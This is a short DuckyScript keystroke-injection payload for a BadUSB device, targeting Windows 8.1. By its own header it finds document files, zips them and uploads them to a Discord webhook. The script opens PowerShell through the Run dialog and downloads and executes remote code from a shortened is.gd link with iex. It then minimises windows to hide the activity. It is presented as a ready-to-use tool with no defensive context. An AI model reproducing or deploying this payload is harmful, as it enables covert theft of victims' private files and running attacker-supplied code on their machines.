REM ┌────────────────────────────────────────────────────┐
REM │ hooker01 | github.com/hooker01                     │
REM │ Description: Finds common document files (.doc,    │
REM │ .pdf, .txt, etc), compresses them, and uploads to  │
REM │ a specified Discord webhook in zip chunks.         │
REM │ Note: Replace 'WEBHOOK_LINK' with your             │
REM │ actual webhook URL.                                │           
REM │ Target: WINDOWS 8.1                                │
REM └────────────────────────────────────────────────────┘

DELAY 300
ESC
GUI r
DELAY 750
STRING powershell 
DELAY 300
ENTER
DELAY 750
STRING $dc='WEBHOOK_LINK';[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; iex (New-Object Net.WebClient).DownloadString('https://is.gd/jciHTz')
DELAY 300
ENTER
DELAY 300
GUI m
DELAY 300
ESC
